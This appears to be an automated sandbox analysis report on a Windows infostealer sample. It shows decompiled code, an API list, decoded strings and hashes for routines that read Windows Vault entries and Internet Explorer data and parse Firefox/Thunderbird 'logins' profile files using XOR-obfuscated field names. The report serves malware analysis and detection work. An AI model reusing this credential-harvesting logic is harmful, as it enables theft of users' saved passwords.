							lstrcpyW(_t238,  *((intOrPtr*)(_t355 + 0x14)) + 0x20);
							_t353 = E00206832();
							_v100 = _t353;
							lstrcpyW(_t353,  *((intOrPtr*)(_v16 + 0x18)) + 0x20);
							_t245 = _v16;
							_v76 = 0;
							_t246 = _v108(_v12, _t245,  *((intOrPtr*)(_t245 + 0x14)),  *((intOrPtr*)(_t245 + 0x18)), 0, 0, 0,  &_v76, 2 + lstrlenW( *((intOrPtr*)(_t355 + 0x18)) + 0x20) * 2, 2 + lstrlenW( *((intOrPtr*)(_t355 + 0x14)) + 0x20) * 2, 2 + lstrlenW( *(_t355 + 0x10)) * 2);
							__eflags = _t246;
							if(_t246 < 0) {
								goto L40;
							}
							_push(2 + lstrlenW( *((intOrPtr*)(_v76 + 0x1c)) + 0x20) * 2);
							_t302 = E00206832();
							lstrcpyW(_t302,  *((intOrPtr*)(_v76 + 0x1c)) + 0x20);
							_push(_v76);
							goto L39;
							L54:
							_t230 = _v116 + 1;
							_t342 = _v120 + 0x38;
							_t312 =  &(_v96[0x1a]);
							_v116 = _t230;
							_v120 = _t342;
							_v96 = _t312;
							__eflags = _t230 - _v104;
						} while (_t230 < _v104);
						_t346 = _v160;
						_t350 = _v124;
						goto L56;
					}
				}
				_v5 = 1;
				if(_v476.dwMinorVersion >= 2) {
					goto L3;
				}
				goto L2;
			}

0x001ea30a
0x001ea31b
0x001ea32c
0x001ea331
0x001ea334
0x001ea341
0x001ea34e
0x001ea35d
0x001ea35d
0x001ea360
0x001ea360
0x001ea362
0x001ea369
0x001ea370
0x001ea372
0x001ea379
0x001ea37f
0x001ea37f
0x001ea383
0x001ea387
0x001ea389
0x001ea389
0x00000000
0x001ea389
0x001ea391
0x001ea395
0x001ea39b
0x001ea39d
0x001ea3a3
0x001ea3a5
0x001ea868
0x001ea3ab
0x001ea3ab
0x001ea3b2
0x001ea3b4
0x001ea3bb
0x001ea3c1
0x001ea3c8
0x001ea3c9
0x001ea3c9
0x001ea3dc
0x001ea3e2
0x001ea3e4
0x001ea3eb
0x001ea3ed
0x001ea3f0
0x001ea3f7
0x001ea3fd
0x001ea403
0x001ea40a
0x001ea40b
0x001ea40b
0x001ea416
0x001ea41e
0x001ea420
0x001ea427
0x001ea429
0x001ea42c
0x001ea433
0x001ea43d
0x001ea440
0x001ea446
0x001ea44d
0x001ea44e
0x001ea44e
0x001ea459
0x001ea460
0x001ea462
0x001ea469
0x001ea46b
0x001ea472
0x001ea479
0x001ea479
0x001ea47b
0x001ea481
0x001ea481
0x001ea485
0x001ea486
0x001ea489
0x00000000
0x00000000
0x001ea48b
0x001ea48b
0x001ea493
0x001ea49b
0x001ea49e
0x001ea4a0
0x001ea4a7
0x001ea4a7
0x001ea4a9
0x001ea4b0
0x001ea4b7
0x001ea4bd
0x001ea4bd
0x001ea4c1
0x001ea4c2
0x001ea4c5
0x00000000
0x00000000
0x001ea4c7
0x001ea4c7
0x001ea4c7
0x001ea4cf
0x001ea4d7
0x001ea4da
0x001ea4dc
0x001ea4e3
0x001ea4e3
0x001ea4e5
0x001ea4ec
0x001ea4f2
0x001ea4f6
0x001ea4f6
0x001ea4fa
0x001ea4fb
0x001ea4fe
0x00000000
0x00000000
0x001ea500
0x001ea500
0x001ea508
0x001ea50e
0x001ea510
0x001ea513
0x001ea516
0x001ea518
0x001ea85d
0x001ea85e
0x00000000
0x001ea85e
0x001ea51e
0x001ea521
0x001ea523
0x00000000
0x00000000
0x001ea529
0x001ea52b
0x00000000
0x00000000
0x001ea531
0x001ea533
0x00000000
0x00000000
0x001ea539
0x001ea53d
0x00000000
0x00000000
0x001ea543
0x001ea547
0x00000000
0x00000000
0x001ea54d
0x001ea55c
0x001ea55e
0x001ea560
0x00000000
0x00000000
0x001ea566
0x001ea56d
0x001ea57e
0x001ea580
0x001ea582
0x001ea857
0x001ea85b
0x00000000
0x001ea85b
0x001ea588
0x001ea58c
0x001ea590
0x001ea851
0x001ea854
0x00000000
0x001ea854
0x001ea596
0x001ea599
0x001ea59b
0x001ea59b
0x001ea59d
0x001ea5a0
0x001ea5a3
0x001ea5a3
0x001ea5a6
0x001ea5a8
0x001ea5aa
0x001ea5af
0x001ea5b2
0x001ea6ac
0x001ea6ae
0x001ea6af
0x001ea6b2
0x001ea6b7
0x001ea6ba
0x001ea6bc
0x00000000
0x00000000
0x001ea6d3
0x001ea6dc
0x001ea6e0
0x001ea701
0x001ea709
0x001ea70e
0x001ea72e
0x001ea734
0x001ea73f
0x001ea74b
0x001ea750
0x001ea75d
0x001ea760
0x001ea762
0x001ea79a
0x001ea79a
0x001ea79d
0x001ea79f
0x001ea7a1
0x001ea7a5
0x001ea7a7
0x001ea7a9
0x001ea7ab
0x001ea7ad
0x001ea7bb
0x001ea7bd
0x001ea7c0
0x001ea7d0
0x001ea7dc
0x001ea7dd
0x001ea7e0
0x001ea7e8
0x001ea7e9
0x001ea7ea
0x001ea7ef
0x001ea7f0
0x001ea7f5
0x001ea7f5
0x001ea7f8
0x001ea7f8
0x001ea7ad
0x001ea7a9
0x001ea7fc
0x001ea801
0x001ea802
0x001ea805
0x001ea807
0x001ea80a
0x001ea80f
0x001ea810
0x001ea812
0x001ea815
0x001ea81a
0x001ea81b
0x001ea81d
0x001ea820
0x001ea825
0x00000000
0x001ea81d
0x001ea77b
0x001ea781
0x001ea78a
0x001ea78a
0x001ea78f
0x001ea795
0x001ea798
0x001ea798
0x00000000
0x001ea798
0x001ea5b8
0x001ea5ba
0x001ea5bb
0x001ea5be
0x001ea5c3
0x001ea5c6
0x001ea5c8
0x00000000
0x00000000
0x001ea5df
0x001ea5e8
0x001ea5ec
0x001ea607
0x001ea613
0x001ea618
0x001ea63c
0x001ea63e
0x001ea649
0x001ea655
0x001ea65e
0x001ea668
0x001ea66b
0x001ea66d
0x00000000
0x00000000
0x001ea68a
0x001ea694
0x001ea69e
0x001ea6a4
0x00000000
0x001ea826
0x001ea82c
0x001ea830
0x001ea833
0x001ea836
0x001ea839
0x001ea83c
0x001ea83f
0x001ea83f
0x001ea848
0x001ea84e
0x00000000
0x001ea84e
0x001ea3a5
0x001ea357
0x001ea35b
0x00000000
0x00000000
0x00000000

APIs

GetVersionExW.KERNEL32(?), ref: 001EA341
LoadLibraryA.KERNEL32(?), ref: 001EA395
GetProcAddress.KERNEL32(00000000,?), ref: 001EA3E2
GetProcAddress.KERNEL32(00000000,?), ref: 001EA41E
GetProcAddress.KERNEL32(00000000,?), ref: 001EA45E
GetProcAddress.KERNEL32(00000000,?), ref: 001EA499
GetProcAddress.KERNEL32(00000000,?), ref: 001EA4D5
GetProcAddress.KERNEL32(00000000,?), ref: 001EA50E
lstrlenW.KERNEL32(?), ref: 001EA5D1
lstrcpyW.KERNEL32 ref: 001EA5EC
lstrlenW.KERNEL32(?), ref: 001EA5F9
lstrcpyW.KERNEL32 ref: 001EA618
lstrlenW.KERNEL32(?), ref: 001EA625
lstrcpyW.KERNEL32 ref: 001EA649
lstrlenW.KERNEL32(?), ref: 001EA67D
lstrcpyW.KERNEL32 ref: 001EA69E
StrStrIW.SHLWAPI(?,Internet Explorer), ref: 001EA7B5
lstrlenW.KERNEL32(00000000), ref: 001EA7C0
lstrlenW.KERNEL32(?), ref: 001EA7D0
FreeLibrary.KERNELBASE(00000000), ref: 001EA85E

Strings

RCKU, xrefs: 001EA433
Internet Explorer, xrefs: 001EA7AF
^(?+2*=27p:22, xrefs: 001EA389
vAULTgETiTEM, xrefs: 001EA4C7
%, xrefs: 001EA47B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
String ID: vAULTgETiTEM$%$Internet Explorer$RCKU$^(?+2*=27p:22
API String ID: 4222390991-95504026
Opcode ID: 5549c3035037460ec925a31dd03676a7fc8665e71bef671bc2cee1b44c5bc2c7
Instruction ID: 0c763d05a62d53b867e43b06174bf74da2f3f3059c5368e6425aef2a7d6af426
Opcode Fuzzy Hash: 5549c3035037460ec925a31dd03676a7fc8665e71bef671bc2cee1b44c5bc2c7
Instruction Fuzzy Hash: C9F18D71D00258AFDF24CFE9DC88BAEBBB8EF09300F14446AE809A7252D734A955CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001E10B1, Relevance: 46.8, APIs: 7, Strings: 19, Instructions: 1335
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E001E10B1(signed int __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t752;
				signed int _t758;
				signed int _t761;
				signed int _t767;
				signed int _t770;
				signed int _t773;
				signed int _t783;
				void* _t804;
				char* _t811;
				char* _t813;
				char* _t817;
				intOrPtr _t818;
				void* _t822;
				void* _t824;
				void* _t829;
				void* _t831;
				void* _t834;
				void* _t836;
				signed int _t839;
				intOrPtr* _t842;
				signed int _t856;
				signed int _t859;
				signed int _t862;
				void* _t866;
				signed int _t868;
				signed int _t871;
				char* _t879;
				char* _t883;
				char* _t885;
				intOrPtr _t886;
				void* _t890;
				void* _t892;
				void* _t897;
				void* _t899;
				void* _t902;
				void* _t904;
				signed int _t907;
				intOrPtr* _t910;
				void* _t918;
				signed int _t925;
				signed int _t928;
				signed int _t931;
				void* _t935;
				signed int _t937;
				signed int _t940;
				signed int _t951;
				void* _t952;
				void* _t956;
				void* _t957;
				signed int _t966;
				signed int _t970;
				void* _t975;
				signed int _t977;
				intOrPtr _t979;
				signed int _t981;
				intOrPtr _t982;
				intOrPtr* _t986;
				signed int _t997;
				signed int _t999;
				intOrPtr _t1002;
				void* _t1003;
				signed int _t1005;
				signed int _t1006;
				signed int _t1008;
				signed int _t1010;
				signed int _t1012;
				signed int _t1016;
				signed int _t1018;
				void* _t1020;
				signed int _t1032;
				void* _t1036;
				char _t1041;
				char _t1048;
				char _t1057;
				void* _t1075;
				intOrPtr _t1079;
				signed char _t1081;
				void* _t1084;
				void* _t1086;
				void* _t1088;
				void* _t1093;
				signed char _t1097;
				intOrPtr _t1102;
				signed char _t1110;
				void* _t1119;
				char _t1129;
				void* _t1132;
				void* _t1134;
				void* _t1136;
				void* _t1141;
				char _t1145;
				intOrPtr _t1150;
				void* _t1157;
				char _t1159;
				void* _t1160;
				signed char _t1177;
				intOrPtr _t1211;
				signed char _t1218;
				char _t1234;
				signed char _t1248;
				signed char _t1251;
				char _t1253;
				char _t1256;
				char _t1257;
				char _t1258;
				char _t1259;
				char _t1266;
				signed int _t1271;
				signed char _t1275;
				char _t1276;
				char _t1278;
				char _t1279;
				signed char _t1280;
				signed int _t1289;
				char _t1293;
				void* _t1295;
				char _t1301;
				char _t1306;
				signed int _t1311;
				signed char _t1314;
				void* _t1317;
				signed int _t1321;
				signed int _t1323;
				intOrPtr _t1324;
				intOrPtr _t1326;
				signed int _t1327;
				void* _t1329;
				signed int _t1335;
				signed int _t1336;
				signed int _t1338;
				char _t1339;
				void* _t1340;
				void* _t1341;
				void* _t1344;
				signed int _t1345;
				intOrPtr* _t1346;
				char _t1347;
				char _t1348;
				char _t1349;
				void* _t1350;
				void* _t1351;
				void* _t1354;
				signed int _t1355;
				intOrPtr* _t1356;
				char _t1357;
				char _t1358;
				intOrPtr _t1359;
				signed int _t1361;
				intOrPtr* _t1362;
				signed int _t1363;
				signed int _t1367;
				signed int _t1368;
				void* _t1369;
				void* _t1371;
				intOrPtr _t1372;
				void* _t1373;
				void* _t1377;
				void* _t1378;
				void* _t1388;

				_t1378 = __eflags;
				L00227790(0x2295ce, _t1369);
				_t1372 = _t1371 - 0x864;
				 *((intOrPtr*)(_t1369 - 0x10)) = _t1372;
				 *((intOrPtr*)(_t1369 - 0xb4)) = __edx;
				 *(_t1369 - 0xc8) = 0;
				_t1330 = __ecx;
				 *(_t1369 - 0x18) = 0;
				 *(_t1369 - 0x20) = 0;
				 *0x22d2d4(0, 0x1a, 0, 0, _t1369 - 0x76c, _t1317, _t1329, _t1020); // executed
				E001DC8EE(_t1369 - 0x870, 0x104, L001F57CC(L001F57CC("%s", __ecx), "Profiles"), _t1369 - 0x76c);
				 *(_t1369 - 0x24) = 0;
				_push( *(_t1369 - 0x24));
				E001D4BDC(_t1369 - 0x870);
				_t1373 = _t1372 + 0x14;
				 *((intOrPtr*)(_t1369 - 4)) = 0;
				_push(_t1369 - 0x420);
				E001CAC66(0, _t1369 - 0xfc, 0, _t1330, _t1378); // executed
				E001D2D4F(_t1369 - 0x420);
				E001CBF31(_t1369 - 0xe8, _t1369 - 0xfc);
				 *((intOrPtr*)(_t1369 - 0xf0)) =  *((intOrPtr*)(_t1369 - 0xe8));
				 *(_t1369 - 0xec) =  *(_t1369 - 0xe4);
				 *((intOrPtr*)(_t1369 - 0xe8)) = 0;
				 *(_t1369 - 0xe4) = 0;
				E001CBF31(_t1369 - 0x280, _t1369 - 0xfc);
				_t1032 = 0;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0xc4], xmm0");
				 *((intOrPtr*)(_t1369 - 0xc4)) = 0;
				 *(_t1369 - 0xc0) = 0;
				if( *((intOrPtr*)(_t1369 - 0x27c)) != 0) {
					E001C9597( *((intOrPtr*)(_t1369 - 0x27c)));
					_t1032 =  *(_t1369 - 0xc0);
				}
				 *((char*)(_t1369 - 4)) = 4;
				 *(_t1369 - 0xb8) = 0xc;
				 *(_t1369 - 0x34) = 0x18;
				while(1) {
					_t752 =  *((intOrPtr*)(_t1369 - 0xf0));
					if(_t752 ==  *((intOrPtr*)(_t1369 - 0xc4))) {
						break;
					}
					_t1320 = _t752 + 0x20;
					 *((char*)(_t1369 - 4)) = 5;
					_t1036 = _t752 + 0x20;
					if(E001CB2CE(_t1036) != 0) {
						E001D3654(_t1320, _t1369 - 0x384);
						_t758 =  *(_t1369 - 0x18) | 0x00000040;
						 *(_t1369 - 0x18) = _t758;
						 *(_t1369 - 0x20) = _t758;
						 *((char*)(_t1369 - 4)) = 6;
						_t760 =  >=  ?  *((void*)(_t1369 - 0x384)) : _t1369 - 0x384;
						_t761 =  *((intOrPtr*)( *0x24c1d8))( >=  ?  *((void*)(_t1369 - 0x384)) : _t1369 - 0x384, _t1036);
						 *((char*)(_t1369 - 4)) = 5;
						_t1330 = _t761;
						E001D2F2D(_t1369 - 0x384);
						if(_t761 == 0) {
							asm("movaps xmm0, [0x23dd60]");
							_t1041 = 0;
							asm("movups [ebp-0x26f], xmm0");
							 *((char*)(_t1369 - 0x25f)) = 0;
							do {
								 *(_t1369 + _t1041 - 0x26e) =  *(_t1369 + _t1041 - 0x26e) ^  *(_t1369 - 0x26f);
								_t1041 = _t1041 + 1;
							} while (_t1041 < 0xf);
							_push(_t1041);
							 *((char*)(_t1369 - 0x25f)) = 0;
							E001D3654(_t1320, _t1369 - 0x3b4);
							 *((char*)(_t1369 - 4)) = 7;
							_t1335 =  *(_t1369 - 0x18) | 0x201;
							 *(_t1369 - 0x20) = _t1335;
							_t1044 =  >=  ?  *((void*)(_t1369 - 0x3b4)) : _t1369 - 0x3b4;
							_t767 = L001F57CC( >=  ?  *((void*)(_t1369 - 0x3b4)) : _t1369 - 0x3b4, _t1369 - 0x26e);
							 *((char*)(_t1369 - 0x13c)) = 0;
							_push( *((intOrPtr*)(_t1369 - 0x13c)));
							 *(_t1369 - 0x24) = _t767;
							E001D4BA2(_t1369 - 0x24);
							 *((intOrPtr*)(_t1369 - 4)) = 8;
							_t1336 = _t1335 | 0x00000002;
							 *(_t1369 - 0x18) = _t1336;
							 *(_t1369 - 0x20) = _t1336;
							if(E001CB272(0, _t1369 - 0x450, _t1320, _t1336) == 0) {
								L13:
								 *((char*)(_t1369 - 0x11)) = 0;
							} else {
								_t1314 = 0x69;
								 *((intOrPtr*)(_t1369 - 0x86)) = 0x6053569;
								 *((intOrPtr*)(_t1369 - 0x82)) = 0x1a07000e;
								_t1234 = 0;
								 *((intOrPtr*)(_t1369 - 0x7e)) = 0x61a0347;
								 *((short*)(_t1369 - 0x7a)) = 7;
								while(1) {
									 *(_t1369 + _t1234 - 0x85) =  *(_t1369 + _t1234 - 0x85) ^ _t1314;
									_t1234 = _t1234 + 1;
									if(_t1234 >= 0xc) {
										break;
									}
									_t1314 =  *((intOrPtr*)(_t1369 - 0x86));
								}
								_push(_t1234);
								 *((char*)(_t1369 - 0x79)) = 0;
								E001D3654(_t1320, _t1369 - 0x39c);
								 *((intOrPtr*)(_t1369 - 4)) = 9;
								_t1367 = _t1336 | 0x4004;
								__eflags =  *((intOrPtr*)(_t1369 - 0x388)) - 0x10;
								 *(_t1369 - 0x20) = _t1367;
								_t1237 =  >=  ?  *((void*)(_t1369 - 0x39c)) : _t1369 - 0x39c;
								_t1016 = L001F57CC( >=  ?  *((void*)(_t1369 - 0x39c)) : _t1369 - 0x39c, _t1369 - 0x85);
								 *((char*)(_t1369 - 0x138)) = 0;
								_push( *((intOrPtr*)(_t1369 - 0x138)));
								 *(_t1369 - 0x24) = _t1016;
								E001D4BA2(_t1369 - 0x24);
								 *((intOrPtr*)(_t1369 - 4)) = 0xa;
								_t1368 = _t1367 | 0x00000008;
								 *(_t1369 - 0x18) = _t1368;
								 *(_t1369 - 0x20) = _t1368;
								_t1018 = E001CB272(0, _t1369 - 0x438, _t1320, _t1368);
								 *((char*)(_t1369 - 0x11)) = 1;
								__eflags = _t1018;
								if(_t1018 != 0) {
									goto L13;
								}
							}
							_t770 =  *(_t1369 - 0x18);
							__eflags = _t770 & 0x00000008;
							if((_t770 & 0x00000008) != 0) {
								_t1012 = _t770 & 0xfffffff7;
								__eflags = _t1012;
								 *(_t1369 - 0x18) = _t1012;
								 *(_t1369 - 0x20) = _t1012;
								E001D2D4F(_t1369 - 0x438);
								_t770 =  *(_t1369 - 0x18);
							}
							__eflags = _t770 & 0x00000004;
							if((_t770 & 0x00000004) != 0) {
								_t1010 = _t770 & 0xfffffffb;
								__eflags = _t1010;
								 *(_t1369 - 0x18) = _t1010;
								 *(_t1369 - 0x20) = _t1010;
								E001D2F2D(_t1369 - 0x39c);
								_t770 =  *(_t1369 - 0x18);
							}
							__eflags = _t770 & 0x00000002;
							if((_t770 & 0x00000002) != 0) {
								_t1008 = _t770 & 0xfffffffd;
								__eflags = _t1008;
								 *(_t1369 - 0x18) = _t1008;
								 *(_t1369 - 0x20) = _t1008;
								E001D2D4F(_t1369 - 0x450);
								_t770 =  *(_t1369 - 0x18);
							}
							 *((intOrPtr*)(_t1369 - 4)) = 5;
							__eflags = _t770 & 0x00000001;
							if((_t770 & 0x00000001) != 0) {
								_t1006 = _t770 & 0xfffffffe;
								__eflags = _t1006;
								 *(_t1369 - 0x18) = _t1006;
								 *(_t1369 - 0x20) = _t1006;
								E001D2F2D(_t1369 - 0x3b4);
							}
							__eflags =  *((char*)(_t1369 - 0x11));
							if( *((char*)(_t1369 - 0x11)) == 0) {
								_t1248 = 0x18;
								 *((intOrPtr*)(_t1369 - 0x78)) = 0x77744418;
								 *((intOrPtr*)(_t1369 - 0x74)) = 0x6b76717f;
								_t1048 = 0;
								 *((intOrPtr*)(_t1369 - 0x70)) = 0x776b7236;
								 *((short*)(_t1369 - 0x6c)) = 0x76;
								while(1) {
									 *(_t1369 + _t1048 - 0x77) =  *(_t1369 + _t1048 - 0x77) ^ _t1248;
									_t1048 = _t1048 + 1;
									__eflags = _t1048 - 0xc;
									if(_t1048 >= 0xc) {
										break;
									}
									_t1248 =  *((intOrPtr*)(_t1369 - 0x78));
								}
								_push(_t1048);
								 *((char*)(_t1369 - 0x6b)) = 0;
								E001D3654(_t1320, _t1369 - 0x3e4);
								_t1330 =  *(_t1369 - 0x18) | 0x04000000;
								 *(_t1369 - 0x18) = _t1330;
								 *(_t1369 - 0x20) = _t1330;
								 *((char*)(_t1369 - 4)) = 0x15;
								__eflags =  *((intOrPtr*)(_t1369 - 0x3d0)) - 0x10;
								_t1051 =  >=  ?  *((void*)(_t1369 - 0x3e4)) : _t1369 - 0x3e4;
								_t773 = L001F57CC( >=  ?  *((void*)(_t1369 - 0x3e4)) : _t1369 - 0x3e4, _t1369 - 0x77);
								 *((char*)(_t1369 - 0xf4)) = 0;
								_push( *((intOrPtr*)(_t1369 - 0xf4)));
								 *(_t1369 - 0x24) = _t773;
								E001D4BA2(_t1369 - 0x24);
								 *((char*)(_t1369 - 4)) = 0x16;
								 *((char*)(_t1369 - 0x11)) = E001CB272(0, _t1369 - 0x498, _t1320, _t1330);
								E001D2D4F(_t1369 - 0x498);
								 *((char*)(_t1369 - 4)) = 5;
								E001D2F2D(_t1369 - 0x3e4);
								__eflags =  *((char*)(_t1369 - 0x11));
								if(__eflags != 0) {
									_t1251 = 0x75;
									 *((intOrPtr*)(_t1369 - 0x6a)) = 0x1a192975;
									 *((intOrPtr*)(_t1369 - 0x66)) = 0x61b1c12;
									_t1057 = 0;
									 *((intOrPtr*)(_t1369 - 0x62)) = 0x1a061f5b;
									 *((short*)(_t1369 - 0x5e)) = 0x1b;
									while(1) {
										 *(_t1369 + _t1057 - 0x69) =  *(_t1369 + _t1057 - 0x69) ^ _t1251;
										_t1057 = _t1057 + 1;
										__eflags = _t1057 - 0xc;
										if(_t1057 >= 0xc) {
											break;
										}
										_t1251 =  *((intOrPtr*)(_t1369 - 0x6a));
									}
									_push(_t1057);
									 *((char*)(_t1369 - 0x5d)) = 0;
									E001D3654(_t1320, _t1369 - 0x3fc);
									_t1338 = _t1330 | 0x80000000;
									 *(_t1369 - 0x18) = _t1338;
									 *(_t1369 - 0x20) = _t1338;
									 *((char*)(_t1369 - 4)) = 0x17;
									__eflags =  *((intOrPtr*)(_t1369 - 0x3e8)) - 0x10;
									_push(0);
									_t782 =  >=  ?  *((void*)(_t1369 - 0x3fc)) : _t1369 - 0x3fc;
									_t783 = E001F5F32(_t1369 - 0x69,  *((intOrPtr*)(_t1369 - 0x3e8)) - 0x10,  >=  ?  *((void*)(_t1369 - 0x3fc)) : _t1369 - 0x3fc, _t1369 - 0x69);
									_t1373 = _t1373 + 0xc;
									 *((char*)(_t1369 - 4)) = 5;
									_t1330 = _t783;
									 *(_t1369 - 0x140) = _t783;
									E001D2F2D(_t1369 - 0x3fc);
									_t1321 = E002075DA(_t783, "r");
									 *(_t1369 - 0x144) = _t1321;
									__eflags = _t1321;
									if(__eflags != 0) {
										E0020660A(_t1251, _t1321, 0, 2);
										_t1330 = E002073A1(0, _t1251, _t1321, _t1330, __eflags, _t1321);
										E0020660A(_t1251, _t1321, 0, 0);
										 *((intOrPtr*)(_t1369 - 0xe0)) = 0;
										_t320 = _t1330 + 1; // 0x1
										 *((intOrPtr*)(_t1369 - 0xd0)) = 0;
										 *((intOrPtr*)(_t1369 - 0xcc)) = 0xf;
										 *((char*)(_t1369 - 0xe0)) = 0;
										E001E3CF6(0, _t1251, _t1321, _t320, 0);
										 *((char*)(_t1369 - 4)) = 0x18;
										__eflags =  *((intOrPtr*)(_t1369 - 0xcc)) - 0x10;
										_t792 =  >=  ?  *((void*)(_t1369 - 0xe0)) : _t1369 - 0xe0;
										E002061F8( >=  ?  *((void*)(_t1369 - 0xe0)) : _t1369 - 0xe0, 1, _t787, _t1321);
										__eflags =  *((intOrPtr*)(_t1369 - 0xcc)) - 0x10;
										_t1065 =  >=  ?  *((void*)(_t1369 - 0xe0)) : _t1369 - 0xe0;
										_t795 =  *((intOrPtr*)(_t1369 - 0xd0)) + ( >=  ?  *((void*)(_t1369 - 0xe0)) : _t1369 - 0xe0);
										__eflags =  *((intOrPtr*)(_t1369 - 0xcc)) - 0x10;
										_t1067 =  >=  ?  *((void*)(_t1369 - 0xe0)) : _t1369 - 0xe0;
										_push( *((intOrPtr*)(_t1369 - 0xd0)) + ( >=  ?  *((void*)(_t1369 - 0xe0)) : _t1369 - 0xe0));
										_push( >=  ?  *((void*)(_t1369 - 0xe0)) : _t1369 - 0xe0);
										E001E7239(0, _t1369 - 0x278);
										_push(1);
										_t1377 = _t1373 + 0x2c - 0x28;
										 *((char*)(_t1369 - 4)) = 0x19;
										_t1252 = _t1369 - 0x278;
										 *((intOrPtr*)(_t1377 + 0x24)) = 0;
										E001E3759(_t1369 - 0x354, _t1369 - 0x278);
										_t1373 = _t1377 + 0x2c;
										 *((char*)(_t1369 - 4)) = 0x1b;
										_t1070 =  *(_t1369 - 0x274);
										__eflags =  *(_t1369 - 0x274);
										if( *(_t1369 - 0x274) != 0) {
											E001C9597(_t1070);
										}
										_push("logins");
										__eflags =  *((char*)(E001E53D1(0, _t1369 - 0x354, _t1252)));
										if(__eflags != 0) {
											_push("logins");
											_t804 = E001E53D1(0, _t1369 - 0x354, _t1252);
											_push(_t1369 - 0xb0);
											E001E7160(_t804, _t1321);
											_t346 = _t1369 - 0xc8;
											 *_t346 =  *(_t1369 - 0xc8) | 0x00000004;
											__eflags =  *_t346;
											 *((char*)(_t1369 - 4)) = 0x1c;
											_t1252 = 0;
											 *(_t1369 - 0x24) = 0;
											while(1) {
												_t1079 =  *((intOrPtr*)(_t1369 - 0xb0));
												__eflags = _t1252 -  *((intOrPtr*)(_t1369 - 0xac)) - _t1079 >> 4;
												if(_t1252 >=  *((intOrPtr*)(_t1369 - 0xac)) - _t1079 >> 4) {
													break;
												}
												_t1323 = _t1252 << 4;
												__eflags =  *((intOrPtr*)(_t1369 - 0xb4)) - "ThunderBird";
												_t1330 = _t1079 + _t1323;
												if( *((intOrPtr*)(_t1369 - 0xb4)) != "ThunderBird") {
													_t1081 = 0x2a;
													 *((intOrPtr*)(_t1369 - 0xa4)) = 0x58454c2a;
													 *((intOrPtr*)(_t1369 - 0xa0)) = 0x485f7947;
													_t1253 = 0;
													 *((intOrPtr*)(_t1369 - 0x9c)) = 0x7f5e4347;
													 *((short*)(_t1369 - 0x98)) = 0x6678;
													 *((char*)(_t1369 - 0x96)) = 0;
													while(1) {
														 *(_t1369 + _t1253 - 0xa3) =  *(_t1369 + _t1253 - 0xa3) ^ _t1081;
														_t1253 = _t1253 + 1;
														__eflags = _t1253 - 0xd;
														if(_t1253 >= 0xd) {
															break;
														}
														_t1081 =  *((intOrPtr*)(_t1369 - 0xa4));
													}
													 *((char*)(_t1369 - 0x96)) = 0;
													_push(_t1369 - 0xa3);
													_t811 = E001E53D1(0, _t1330, _t1253);
													__eflags =  *_t811;
													if( *_t811 != 0) {
														_t1339 = 0;
														asm("movaps xmm0, [0x23db20]");
														asm("movups [ebp-0x157], xmm0");
														 *((short*)(_t1369 - 0x147)) = 0x3a32;
														_t1084 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
														 *((char*)(_t1369 - 0x145)) = 0;
														do {
															_t1255 =  *(_t1369 - 0x157);
															 *(_t1369 + _t1339 - 0x156) =  *(_t1369 + _t1339 - 0x156) ^  *(_t1369 - 0x157);
															_t1339 = _t1339 + 1;
															__eflags = _t1339 - 0x11;
														} while (_t1339 < 0x11);
														 *((char*)(_t1369 - 0x145)) = 0;
														_push(_t1369 - 0x156);
														_t813 = E001E53D1(0, _t1084, _t1255);
														__eflags =  *_t813;
														if( *_t813 != 0) {
															_t1256 = 0;
															asm("movaps xmm0, [0x23da50]");
															asm("movups [ebp-0x16a], xmm0");
															 *((short*)(_t1369 - 0x15a)) = 0x2c3a;
															_t1086 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
															 *((char*)(_t1369 - 0x158)) = 0;
															do {
																 *(_t1369 + _t1256 - 0x169) =  *(_t1369 + _t1256 - 0x169) ^  *(_t1369 - 0x16a);
																_t1256 = _t1256 + 1;
																__eflags = _t1256 - 0x11;
															} while (_t1256 < 0x11);
															 *((char*)(_t1369 - 0x158)) = 0;
															_push(_t1369 - 0x169);
															_t817 = E001E53D1(0, _t1086, _t1256);
															__eflags =  *_t817;
															if( *_t817 != 0) {
																_t818 = 0xf;
																 *((intOrPtr*)(_t1369 - 0x1f4)) = 0;
																 *((intOrPtr*)(_t1369 - 0x1e4)) = 0;
																 *((intOrPtr*)(_t1369 - 0x1e0)) = _t818;
																 *((char*)(_t1369 - 0x1f4)) = 0;
																 *((intOrPtr*)(_t1369 - 0x23c)) = 0;
																 *((intOrPtr*)(_t1369 - 0x22c)) = 0;
																 *((intOrPtr*)(_t1369 - 0x228)) = _t818;
																 *((char*)(_t1369 - 0x23c)) = 0;
																 *((intOrPtr*)(_t1369 - 0x114)) = 0;
																 *((intOrPtr*)(_t1369 - 0x104)) = 0;
																 *((intOrPtr*)(_t1369 - 0x100)) = _t818;
																 *((char*)(_t1369 - 0x114)) = 0;
																 *((char*)(_t1369 - 4)) = 0x25;
																_t1257 = 0;
																asm("movaps xmm0, [0x23dac0]");
																asm("movups [ebp-0x17d], xmm0");
																 *((short*)(_t1369 - 0x16d)) = 0x363e;
																_t1088 =  *((intOrPtr*)(_t1369 - 0xb0)) + _t1323;
																 *((char*)(_t1369 - 0x16b)) = 0;
																do {
																	 *(_t1369 + _t1257 - 0x17c) =  *(_t1369 + _t1257 - 0x17c) ^  *(_t1369 - 0x17d);
																	_t1257 = _t1257 + 1;
																	__eflags = _t1257 - 0x11;
																} while (_t1257 < 0x11);
																 *((char*)(_t1369 - 0x16b)) = 0;
